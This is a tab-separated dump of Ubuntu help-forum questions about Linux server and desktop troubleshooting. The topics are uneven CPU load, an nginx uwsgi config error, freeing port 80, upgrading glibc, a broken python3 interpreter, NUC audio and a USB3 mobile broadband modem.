424423	12.04 lts could not reach an even cpu load	i have a 12.04 lts server . 2 x xeon e5-2620v2 processors . i run same program on each processor . after some days , the second processor seems to be in error status . ( i monitor them with turbostat and get this : ) pk cor cpu % c0 ghz tsc smi % c1 % c3 % c6 % c7 ctmp ptmp % pc2 % pc3 % pc6 % pc7 pkg_w cor_w ram_w pkg_ % ram_ % 74.67 2.40 2.10 0 21.98 0.96 2.39 0.00 65 65 0.00 0.00 0.00 0.00 72.49 47.30 11.54 0.00 0.00 0 0 0 91.49 2.40 2.10 0 8.51 0.00 0.00 0.00 58 60 0.00 0.00 0.00 0.00 37.73 25.11 5.89 0.00 0.00 0 0 12 95.78 2.40 2.10 0 4.22 0 1 1 87.64 2.40 2.10 0 11.54 0.18 0.64 0.00 57 0 1 13 87.34 2.40 2.10 0 11.84 0 2 2 87.32 2.40 2.10 0 12.03 0.15 0.50 0.00 55 0 2 14 86.75 2.40 2.10 0 12.60 0 3 3 88.71 2.40 2.10 0 10.73 0.05 0.50 0.00 57 0 3 15 88.04 2.40 2.10 0 11.40 0 4 4 87.63 2.40 2.10 0 11.46 0.18 0.73 0.00 59 0 4 16 88.28 2.40 2.10 0 10.81 0 5 5 88.14 2.40 2.10 0 11.17 0.13 0.56 0.00 52 0 5 17 87.58 2.40 2.10 0 11.74 1 0 6 100.00 2.40 2.10 0 0.00 0.00 0.00 0.00 62 65 0.00 0.00 0.00 0.00 34.76 22.19 5.64 0.00 0.00 1 0 18 100.00 2.40 2.10 0 0.00 1 1 7 99.99 2.40 2.10 0 0.01 0.00 0.00 0.00 65 1 1 19 100.00 2.40 2.10 0 0.00 1 2 8 99.99 2.40 2.10 0 0.01 0.00 0.00 0.00 62 1 2 20 2.51 2.40 2.10 0 97.49 1 3 9 100.00 2.40 2.10 0 0.00 0.00 0.00 0.00 58 1 3 21 1.48 2.40 2.10 0 98.52 1 4 10 10.45 2.40 2.10 0 53.01 10.83 25.71 0.00 56 1 4 22 11.40 2.40 2.10 0 52.06 1 5 11 1.54 2.40 2.10 0 98.46 0.00 0.00 0.00 59 1 5 23 99.99 2.40 2.10 0 0.01 as you can see the second processor , some cpu ( 6/18/7/19/8 ) is very busy but some others ( 20/21/11 ) nearly has nothing to do . and have a look at the first processor , it has an even cpu load . what wrong with it ? its a cpu hardware issue or a ubuntu issue ?
424424	nginx : unknown directive `` uwsgi_param '' in /etc/nginx/uwsgi_params:1	using this deployment tutorial , i 'm trying to get an ubuntu 12.04 server up and running with flask , uwsgi and nginx . i now have trouble getting nginx to run . when i try to ( re ) start nginx it simply says ... fail ! , and when i run a test ( using sudo nginx -t ) , it says : nginx : [ emerg ] unknown directive `` uwsgi_param '' in /etc/nginx/uwsgi_params:1 nginx : configuration file /etc/nginx/nginx.conf test failed i did n't change anything in that file , so its contents are the default ones : uwsgi_param query_string $ query_string ; uwsgi_param request_method $ request_method ; uwsgi_param content_type $ content_type ; uwsgi_param content_length $ content_length ; uwsgi_param request_uri $ request_uri ; uwsgi_param path_info $ document_uri ; uwsgi_param document_root $ document_root ; uwsgi_param server_protocol $ server_protocol ; uwsgi_param uwsgi_scheme $ scheme ; uwsgi_param remote_addr $ remote_addr ; uwsgi_param remote_port $ remote_port ; uwsgi_param server_port $ server_port ; uwsgi_param server_name $ server_name ; my server definition in /etc/nginx/sites-available/www looks like this : server { listen 8080 ; server_name myapp ; root /var/www/myapp ; try_files $ uri @ uwsgi ; location @ uwsgi { include uwsgi_params ; uwsgi_pass unix : /tmp/myapp.sock ; } } does anybody know what i 'm doing wrong here ? why does n't this run ? all tips are welcome !
424426	kill process on port 80	hi 'yall i tried running this command on my terminal to kill the tcp process so i can start my apache service . but it 's seem there 's some kind of mistakes . here is the result and the command line i 've tried to use . trainee @ sysad : ~ $ sudo netstat -ltnp | grep ':80' sudo : unable to resolve host sysad tcp6 0 0 : ::80 : : : * listen 998/httpd trainee @ sysad : ~ $ sudo killall -9 80/tcp6 sudo : unable to resolve host sysad 80/tcp6 : no such file or directory trainee @ sysad : ~ $ sudo killall -9 tcp6 sudo : unable to resolve host sysad tcp6 : no process found trainee @ sysad : ~ $ sudo killall -9 tcp6/80 sudo : unable to resolve host sysad tcp6/80 : no such file or directory trainee @ sysad : ~ $ sudo killall -9 16085 sudo : unable to resolve host sysad 16085 : no process found and when i run my httpd service . here 's what it says : trainee @ sysad : ~ $ sudo service httpd start sudo : unable to resolve host sysad httpd : syntax error on line 53 of /usr/local/apache2/conf/httpd.conf : can not load/usr/local/apache2/modules/libphp5.so into server : libmysqlclient.so.18 : can not open shared object file : no such file or directory thank you so much in advance . i 'll answer my own problem : here 's what i typed though : $ sudo kill 998 just like in my case when i reboot my system , i got the same error . then typed the command : trainee @ sysad : ~ $ sudo netstat -ltnp | grep ':80' tcp6 0 0 : ::80 : : : * listen < number > /httpd then the number will be different . then i altered the sudo kill like : $ sudo kill < number > well it worked for me though . i do n't know to others ( you ) if it works as well : )
424428	glibc 2.15 installation/upgrade	i was installing utorrent server in my ubuntu 12.04.4 lts and appeared the following error : utserver : /lib/x86_64-linux-gnu/libc.so.6 : version `glibc_2.16 ' not found ( required by utserver ) so , i 've started to search in web to a solution , i tried for some hours and i did n't got my goal . my glibc is 2.15 ldd -- version ldd ( ubuntu eglibc 2.15-0ubuntu10.5 ) 2.15 i installed the following packages apt-get install gcc gawk g++ build-essential linux-headers-`uname -r` one of this tries was to download the library and install . mkdir /catbed/ & & cd /catbed/ wget https : //launchpad.net/ubuntu/+archive/primary/+files/eglibc_2.16.orig.tar.xz tar -xjf eglibc_2.16.orig.tar.xz mkdir /catbed/glibc-build & & cd /catbed/glibc-build /catbed/eglibc-2.16/.configure -- disable-sanity-checks make make install unfortunally i didnt got success , i want to paste my config.log here but the body is limited to 30000 characters . can anyone help me to update this glibc to 2.16 or 2.17 ? ? ? # # edit in this thread : libc.so.6 : version `glibc_2.16 ' not found @ barafu albino said : there is a much safer way to run a single app . problem is : while glibc is meant to be backwards-compatible , it is not 100 % accurate . issues are known . so , do not update the library system-wide . instead , prepare a whole set of updated libraries . put them in , say , /catbed . then just run /catbed/ld-linux.so.3 -- library-path=/catbed : /whatever-else /usr/bin/python -python-args of cause , adapt the filenames to your case . this is much safer way to go , because if you mess up your system ld-linux+libc pair you will not be able to fix it from inside the os . you will have hard times even chrooting into it then . i routinely use the trick for old proprietary linuxes ( gcc 3.1 , kernel 2.3 ) on which i want to run qt5 . but unfortunally i did n't understood what this mean or how to reproduce in my computer , can anyone explain me that ? -- edit -- the application that i was installing now have a version that supports ubuntu 12.04.4 that do n't require glibc 2.15 .
424434	i crashed my ubuntu pc	when i poweron my ubuntu pc , it does n't load.then i goes into ubuntu recovery mode and tried the below command , $ sudo service lightdm restart -- bash : /usr/lib/command-not-found : /usr/bin/python3 : bad interpreter no such file or directory whenever i apply sudo command , it always shows the above error . the below answer recommends me to boot from live disk and then chroot into the installed ubuntu partition.i tried that but still the same error message exists , ubuntu @ ubuntu : ~ $ sudo mount /dev/sda3 /mnt ubuntu @ ubuntu : ~ $ sudo chroot /mnt bash : groups : command not found root @ ubuntu : / # sudo apt-get install -- reinstall coreutils bash : /usr/lib/command-not-found : /usr/bin/python3 : bad interpreter : no such file or directory root @ ubuntu : / #
424437	sound on intel nuc kit dn2820fykh	as per recommendation , last week i installed the daily ppa for pulse audio and tonight i did a dist-upgrade which gave me a new kernel and this killed sound on my ubuntu . i can not open the device chooser and i already purged the previous kernels . output 1 : xbmc @ xbmc : ~ $ aplay -l aplay : device_list:268 : no soundcards found ... outout 2 : xbmc @ xbmc : ~ $ sudo modprobe snd-hda-intel error : could not insert 'snd_hda_intel ' : unknown symbol in module , or unknown parameter ( see dmesg ) output 3 : xbmc @ xbmc : ~ $ lspci -v 00:00.0 host bridge : intel corporation valleyview ssa-cunit ( rev 0c ) subsystem : intel corporation device 2055 flags : bus master , fast devsel , latency 0 00:02.0 vga compatible controller : intel corporation valleyview gen7 ( rev 0c ) ( prog-if 00 [ vga controller ] ) subsystem : intel corporation device 2055 flags : bus master , fast devsel , latency 0 , irq 106 memory at d0000000 ( 32-bit , non-prefetchable ) [ size=4m ] memory at c0000000 ( 32-bit , prefetchable ) [ size=256m ] i/o ports at f080 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:13.0 sata controller : intel corporation valleyview 6-port sata ahci controller ( rev 0c ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : intel corporation device 2055 flags : bus master , 66mhz , medium devsel , latency 0 , irq 104 i/o ports at f070 [ size=8 ] i/o ports at f060 [ size=4 ] i/o ports at f050 [ size=8 ] i/o ports at f040 [ size=4 ] i/o ports at f020 [ size=32 ] memory at d0816000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:14.0 usb controller : intel corporation valleyview usb xhci host controller ( rev 0c ) ( prog-if 30 [ xhci ] ) subsystem : intel corporation device 2055 flags : bus master , medium devsel , latency 0 , irq 103 memory at d0800000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:1a.0 encryption controller : intel corporation valleyview sec ( rev 0c ) subsystem : intel corporation device 2055 flags : bus master , fast devsel , latency 0 , irq 255 memory at d0500000 ( 32-bit , non-prefetchable ) [ size=1m ] memory at d0400000 ( 32-bit , non-prefetchable ) [ size=1m ] capabilities : < access denied > 00:1b.0 audio device : intel corporation valleyview high definition audio controller ( rev 0c ) subsystem : intel corporation device 2055 flags : bus master , fast devsel , latency 0 , irq 4 memory at d0810000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > 00:1c.0 pci bridge : intel corporation valleyview pci express root port ( rev 0c ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00002000-00002fff capabilities : < access denied > kernel driver in use : pcieport 00:1c.1 pci bridge : intel corporation valleyview pci express root port ( rev 0c ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : d0700000-d07fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.2 pci bridge : intel corporation valleyview pci express root port ( rev 0c ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : d0600000-d06fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.3 pci bridge : intel corporation valleyview pci express root port ( rev 0c ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 00004000-00004fff capabilities : < access denied > kernel driver in use : pcieport 00:1f.0 isa bridge : intel corporation valleyview power control unit ( rev 0c ) subsystem : intel corporation device 2055 flags : bus master , medium devsel , latency 0 capabilities : < access denied > 00:1f.3 smbus : intel corporation valleyview smbus controller ( rev 0c ) subsystem : intel corporation device 2055 flags : medium devsel , irq 5 memory at d0814000 ( 32-bit , non-prefetchable ) [ size=32 ] i/o ports at f000 [ size=32 ] capabilities : < access denied > 02:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) subsystem : intel corporation wireless-n 7260 flags : bus master , fast devsel , latency 0 , irq 107 memory at d0700000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlwifi 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0c ) subsystem : intel corporation device 2055 flags : bus master , fast devsel , latency 0 , irq 105 i/o ports at e000 [ size=256 ] memory at d0604000 ( 64-bit , non-prefetchable ) [ size=4k ] memory at d0600000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169
424438	using hot corners , spread all windows function , all preview images are blank ... any ideas ?	using ubuntu 13.10 and unity tweak tool . i have the hot corners feature setup to spread all windows when i go to the bottom left corner . however ~97.63 % of the time when i spread all windows , all previews are blank , and when i hover the mouse over them , i can see the highlighted boarder of the window/application , but the screen is blank otherwise . if i click the empty window preview the correct window will open , and then when i go back to spread all windows , and the one i clicked is visible and the rest are still blank . i then have to go through and click all the empty previews one at a time to find the one i 'm looking for . this is almost unusable . has anyone had this problem or does anyone know some possible solutions ? thanks .
424439	ubuntu 12.04 lts does not recognize vodafone mobile broadband k3765-z ( zte ) on usb3	a k3765-z mobile broadband pen is working fine on other laptops/other distros ( including ubuntu 13.10 ) , but is not being recognized on a cold boot on my new clevo p150sm ( which only has usb3 slots - the ones with a blue insert ) . $ uname -a linux khaki 3.11.0-17-generic # 31~precise1-ubuntu smp tue feb 4 21:25:43 utc 2014 x86_64 x86_64 x86_64 gnu/linux on a cold boot , /var/log/syslog shows : feb 22 02:37:29 khaki kernel : [ 54.056601 ] usb 3-1 : new high-speed usb device number 5 using xhci_hcd feb 22 02:37:30 khaki kernel : [ 54.492356 ] usb 3-1 : new usb device found , idvendor=19d2 , idproduct=2000 feb 22 02:37:30 khaki kernel : [ 54.492360 ] usb 3-1 : new usb device strings : mfr=3 , product=2 , serialnumber=4 feb 22 02:37:30 khaki kernel : [ 54.492362 ] usb 3-1 : product : vodafone mobile broadband k3765-z feb 22 02:37:30 khaki kernel : [ 54.492363 ] usb 3-1 : manufacturer : vodafone ( zte ) feb 22 02:37:30 khaki kernel : [ 54.492364 ] usb 3-1 : serialnumber : p673a1vdf_ms feb 22 02:37:30 khaki mtp-probe : checking bus 3 , device 5 : `` /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1 '' feb 22 02:37:30 khaki mtp-probe : bus : 3 , device : 5 was not an mtp device feb 22 02:37:30 khaki kernel : [ 54.512728 ] usb-storage 3-1:1.0 : usb mass storage device detected feb 22 02:37:30 khaki kernel : [ 54.512768 ] scsi6 : usb-storage 3-1:1.0 feb 22 02:37:30 khaki kernel : [ 54.512818 ] usbcore : registered new interface driver usb-storage feb 22 02:37:31 khaki kernel : [ 55.514481 ] scsi 6:0:0:0 : cd-rom vodafone usb scsi cd-rom usb pq : 0 ansi : 2 feb 22 02:37:31 khaki kernel : [ 55.526321 ] sr1 : scsi-1 drive feb 22 02:37:31 khaki kernel : [ 55.526491 ] sr 6:0:0:0 : attached scsi cd-rom sr1 feb 22 02:37:31 khaki kernel : [ 55.526566 ] sr 6:0:0:0 : attached scsi generic sg3 type 5 feb 22 02:37:31 khaki usb_modeswitch : switching device 19d2:2000 on 003/005 but nothing more happens . there are no /dev/ttyusb devices setup , and network manager does not detect the pen . if i use the pen under windows , and do a hot-reboot to ubuntu , it gets to the point where the network manager detects the pen ( but i have still been unable to successfully establish a connection using the same parameters that i used on other laptops ) . /var/log/syslog following a hot reboot shows : ... feb 22 02:47:50 khaki kernel : [ 1.377343 ] usb 3-1 : new high-speed usb device number 2 using xhci_hcd feb 22 02:47:50 khaki kernel : [ 1.408517 ] usb 3-1 : new usb device found , idvendor=19d2 , idproduct=2002 feb 22 02:47:50 khaki kernel : [ 1.408521 ] usb 3-1 : new usb device strings : mfr=4 , product=3 , serialnumber=5 feb 22 02:47:50 khaki kernel : [ 1.408523 ] usb 3-1 : product : vodafone mobile broadband k3765-z feb 22 02:47:50 khaki kernel : [ 1.408524 ] usb 3-1 : manufacturer : vodafone ( zte ) feb 22 02:47:50 khaki kernel : [ 1.408525 ] usb 3-1 : serialnumber : p673a1vdf_ms feb 22 02:47:50 khaki kernel : [ 1.416532 ] usb-storage 3-1:1.5 : usb mass storage device detected feb 22 02:47:50 khaki kernel : [ 1.416614 ] scsi6 : usb-storage 3-1:1.5 feb 22 02:47:50 khaki kernel : [ 1.416674 ] usbcore : registered new interface driver usb-storage ... feb 22 02:47:50 khaki kernel : [ 2.294704 ] usbcore : registered new interface driver usbserial feb 22 02:47:50 khaki kernel : [ 2.294715 ] usbcore : registered new interface driver usbserial_generic feb 22 02:47:50 khaki kernel : [ 2.294724 ] usbserial : usb serial support registered for generic feb 22 02:47:50 khaki kernel : [ 2.295727 ] iwlwifi 0000:06:00.0 : loaded firmware version 18.168.6.1 op_mode iwldvm feb 22 02:47:50 khaki kernel : [ 2.299668 ] usbcore : registered new interface driver cdc_wdm feb 22 02:47:50 khaki kernel : [ 2.300672 ] usbcore : registered new interface driver option feb 22 02:47:50 khaki kernel : [ 2.300681 ] usbserial : usb serial support registered for gsm modem ( 1-port ) feb 22 02:47:50 khaki kernel : [ 2.300735 ] option 3-1:1.0 : gsm modem ( 1-port ) converter detected feb 22 02:47:50 khaki kernel : [ 2.300867 ] usb 3-1 : gsm modem ( 1-port ) converter now attached to ttyusb0 feb 22 02:47:50 khaki kernel : [ 2.300909 ] option 3-1:1.1 : gsm modem ( 1-port ) converter detected feb 22 02:47:50 khaki kernel : [ 2.300953 ] usb 3-1 : gsm modem ( 1-port ) converter now attached to ttyusb1 feb 22 02:47:50 khaki kernel : [ 2.300989 ] option 3-1:1.2 : gsm modem ( 1-port ) converter detected feb 22 02:47:50 khaki kernel : [ 2.301031 ] usb 3-1 : gsm modem ( 1-port ) converter now attached to ttyusb2 feb 22 02:47:50 khaki kernel : [ 2.301067 ] option 3-1:1.3 : gsm modem ( 1-port ) converter detected feb 22 02:47:50 khaki kernel : [ 2.301113 ] usb 3-1 : gsm modem ( 1-port ) converter now attached to ttyusb3 ... feb 22 02:47:50 khaki kernel : [ 2.361761 ] qmi_wwan 3-1:1.4 : cdc-wdm0 : usb wdm device feb 22 02:47:50 khaki kernel : [ 2.361939 ] qmi_wwan 3-1:1.4 wwan0 : register 'qmi_wwan ' at usb-0000:00:14.0-1 , wwan/qmi device , d2:1c:65:8c : b2:21 feb 22 02:47:50 khaki kernel : [ 2.361988 ] usbcore : registered new interface driver qmi_wwan ... feb 22 02:47:51 khaki networkmanager [ 1343 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1/3-1:1.4/net/wwan0 , iface : wwan0 ) feb 22 02:47:51 khaki networkmanager [ 1343 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1/3-1:1.4/net/wwan0 , iface : wwan0 ) : no ifupdown configuration found . ... feb 22 02:47:51 khaki networkmanager [ 1343 ] : < info > loaded plugin ifupdown : ( c ) 2008 canonical ltd. to report bugs please use the networkmanager mailing list . feb 22 02:47:51 khaki networkmanager [ 1343 ] : < info > loaded plugin keyfile : ( c ) 2007 - 2010 red hat , inc. to report bugs please use the networkmanager mailing list . feb 22 02:47:51 khaki networkmanager [ 1343 ] : ifupdown : get unmanaged devices count : 0 feb 22 02:47:51 khaki networkmanager [ 1343 ] : scplugin-ifupdown : ( 10521392 ) ... get_connections . feb 22 02:47:51 khaki networkmanager [ 1343 ] : scplugin-ifupdown : ( 10521392 ) ... get_connections ( managed=false ) : return empty list . feb 22 02:47:51 khaki networkmanager [ 1343 ] : keyfile : parsing vodafone default ... feb 22 02:47:51 khaki networkmanager [ 1343 ] : keyfile : read connection 'vodafone default' ... feb 22 02:47:52 khaki modem-manager [ 1306 ] : < info > ( ttyusb1 ) closing serial port ... feb 22 02:47:52 khaki modem-manager [ 1306 ] : < info > ( ttyusb1 ) serial port closed feb 22 02:47:52 khaki modem-manager [ 1306 ] : < info > ( zte ) : gsm modem /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1 claimed port ttyusb1 ... feb 22 02:47:53 khaki modem-manager [ 1306 ] : < info > ( ttyusb3 ) closing serial port ... feb 22 02:47:53 khaki modem-manager [ 1306 ] : < info > ( ttyusb3 ) serial port closed feb 22 02:47:53 khaki modem-manager [ 1306 ] : < info > ( ttyusb3 ) opening serial port ... feb 22 02:47:53 khaki modem-manager [ 1306 ] : < info > ( zte ) : gsm modem /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1 claimed port ttyusb3 feb 22 02:47:53 khaki modem-manager [ 1306 ] : < info > ( zte ) : gsm modem /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1 claimed port wwan0 ... feb 22 02:48:23 khaki modem-manager [ 1306 ] : < info > ( ttyusb0 ) closing serial port ... feb 22 02:48:23 khaki modem-manager [ 1306 ] : < info > ( ttyusb0 ) serial port closed feb 22 02:48:23 khaki modem-manager [ 1306 ] : < info > ( ttyusb0 ) opening serial port ... feb 22 02:48:23 khaki modem-manager [ 1306 ] : < info > ( ttyusb2 ) closing serial port ... feb 22 02:48:23 khaki modem-manager [ 1306 ] : < info > ( ttyusb2 ) serial port closed feb 22 02:48:23 khaki modem-manager [ 1306 ] : < info > ( ttyusb2 ) opening serial port ... feb 22 02:48:26 khaki modem-manager [ 1306 ] : < info > ( ttyusb0 ) closing serial port ... feb 22 02:48:26 khaki modem-manager [ 1306 ] : < info > ( ttyusb0 ) serial port closed feb 22 02:48:26 khaki modem-manager [ 1306 ] : < info > ( zte ) : gsm modem /sys/devices/pci0000:00/0000:00:14.0/usb3/3-1 claimed port ttyusb0 feb 22 02:48:29 khaki modem-manager [ 1306 ] : < info > ( ttyusb2 ) closing serial port ... feb 22 02:48:29 khaki modem-manager [ 1306 ] : < info > ( ttyusb2 ) serial port closed feb 22 02:48:29 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : new gsm/umts device ( driver : 'option1 ' ifindex : 3 ) feb 22 02:48:29 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : exported as /org/freedesktop/networkmanager/devices/3 feb 22 02:48:29 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : now managed feb 22 02:48:29 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] feb 22 02:48:29 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : bringing up device . feb 22 02:48:29 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : deactivating device ( reason 'managed ' ) [ 2 ] feb 22 02:48:29 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : device state change : unavailable - > disconnected ( reason 'none ' ) [ 20 30 0 ] ... feb 22 02:49:06 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) starting connection 'vodafone default' feb 22 02:49:06 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] feb 22 02:49:06 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) scheduled ... feb 22 02:49:06 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) started ... feb 22 02:49:06 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) complete . feb 22 02:49:06 khaki modem-manager [ 1306 ] : < info > ( ttyusb3 ) opening serial port ... feb 22 02:49:06 khaki modem-manager [ 1306 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( disabled - > enabling ) feb 22 02:49:06 khaki modem-manager [ 1306 ] : < info > ( ttyusb1 ) opening serial port ... feb 22 02:49:06 khaki modem-manager [ 1306 ] : < info > ( ttyusb3 ) : using text mode for sms feb 22 02:49:06 khaki modem-manager [ 1306 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( enabling - > enabled ) feb 22 02:49:06 khaki networkmanager [ 1343 ] : < info > wwan now enabled by management service feb 22 02:49:06 khaki modem-manager [ 1306 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( enabled - > registered ) feb 22 02:49:07 khaki modem-manager [ 1306 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( registered - > connecting ) feb 22 02:49:07 khaki modem-manager [ 1306 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( connecting - > connected ) feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) scheduled ... feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) starting ... feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) successful . feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) scheduled . feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 2 of 5 ( device configure ) complete . feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) started ... feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > starting ppp connection feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > pppd started with pid 2911 ... feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 3 of 5 ( ip configure start ) complete . feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . feb 22 02:49:07 khaki pppd [ 2911 ] : unrecognized option 'wwan0' feb 22 02:49:07 khaki networkmanager [ 1343 ] : < warn > pppd pid 2911 exited with error : pppd options error feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] feb 22 02:49:07 khaki networkmanager [ 1343 ] : < warn > activation ( wwan0 ) failed . feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . feb 22 02:49:07 khaki modem-manager [ 1306 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( connected - > disconnecting ) feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] feb 22 02:49:07 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : deactivating device ( reason 'none ' ) [ 0 ] feb 22 02:49:10 khaki networkmanager [ 1343 ] : < info > auto-activating connection 'vodafone default ' . feb 22 02:49:10 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) starting connection 'vodafone default' feb 22 02:49:10 khaki networkmanager [ 1343 ] : < info > ( wwan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] feb 22 02:49:10 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) scheduled ... feb 22 02:49:10 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) started ... feb 22 02:49:10 khaki networkmanager [ 1343 ] : < info > activation ( wwan0 ) stage 1 of 5 ( device prepare ) complete . feb 22 02:49:11 khaki modem-manager [ 1306 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( disconnecting - > registered ) feb 22 02:49:31 khaki networkmanager [ 1343 ] : < warn > gsm connection failed : ( 32 ) serial command timed out ... any ideas on how to get the pen working ? ( without booting into windows 1st : - ) update : regarding the suggestion of adding file /etc/udev/rules.d/90-zte.rules with : subsystem== '' block '' , subsystem== '' scsi '' , attrs { model } == '' usb storage ffe9 '' , action== '' add '' , run+= '' /sbin/modprobe usbserial vendor=0x19d2 product=0x2000 '' and then performing ( after pen insertion ) # modprobe usbserial vendor=0x19d2 product=0x2000 /var/log/syslog shows : feb 22 12:24:35 khaki kernel : [ 361.013336 ] usbcore : registered new interface driver usbserial feb 22 12:24:35 khaki kernel : [ 361.013367 ] usbcore : registered new interface driver usbserial_generic feb 22 12:24:35 khaki kernel : [ 361.013398 ] usbserial : usb serial support registered for generic feb 22 12:24:35 khaki kernel : [ 361.013421 ] usbserial_generic 3-1:1.0 : the `` generic '' usb-serial driver is only for testing and one-off prototypes . feb 22 12:24:35 khaki kernel : [ 361.013425 ] usbserial_generic 3-1:1.0 : tell linux-usb @ vger.kernel.org to add your device to a proper driver . feb 22 12:24:35 khaki kernel : [ 361.013429 ] usbserial_generic 3-1:1.0 : generic converter detected feb 22 12:24:35 khaki kernel : [ 361.013612 ] usb 3-1 : generic converter now attached to ttyusb0 feb 22 12:24:35 khaki modem-manager [ 1210 ] : < info > ( ttyusb0 ) opening serial port ... feb 22 12:25:07 khaki modem-manager [ 1210 ] : < info > ( ttyusb0 ) closing serial port ... feb 22 12:25:37 khaki modem-manager [ 1210 ] : < info > ( ttyusb0 ) serial port closed feb 22 12:25:37 khaki modem-manager [ 1210 ] : < info > ( ttyusb0 ) opening serial port ... feb 22 12:25:43 khaki modem-manager [ 1210 ] : < info > ( ttyusb0 ) closing serial port ... and no usable /dev/ttyusb0 device remains . update : maybe this is a sort-of-duplicate of ubuntu 12.04 - usb3 issue with mobile broadband usb sticks once i get the time to investigate , i will post more details .
